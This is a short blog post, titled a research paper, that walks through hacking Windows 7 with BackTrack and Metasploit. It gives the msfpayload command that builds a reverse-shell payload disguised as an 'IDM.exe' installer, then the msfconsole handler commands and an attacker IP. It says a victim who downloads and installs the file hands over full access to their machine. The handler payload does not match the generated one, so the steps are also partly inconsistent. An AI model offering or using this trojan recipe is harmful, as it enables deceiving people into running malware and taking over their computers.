RESEARCH PAPER ONHACKING WIN-7THROUGH BACKTRACK(METASPLOIT)So let's just begin with our hacking 1. Open the terminal of the Backtrack 2. Write the following command "msfpayload windows/meterpreter/reverse_tcp lhost=backtrack IP address lport=4444 x > /root/Desktop/IDM.exe" AND WAIT FOR A MINUTE... After the Successful completion of your IDM.exe 3. Again Open another terminal and write 'msfconsole'
4. Then write the command -- "use exploit/multi/handler" and press enter" 5. Then you have to set a payload by writing the command -- "set payload windows/vncinject/reverse_tcp" 6. Then Set the LHOST (LOCAL HOST) -- "set lhost 192.168.40.128(Backtrack IP address) 7. Then Just set for the exploit -- "exploit" Now as soon as The VICTIM download your IDM file from the INTERNET and tried to install you will get the full Access of his/her WIN-7
THE ARTICLE HAS BEEN SUBMITTED BY Deepanshu Khanna CREATOR OF THE WEBSITE http://hackcrack4u.blogspot.in
Comments[ 0 ]
Post a Comment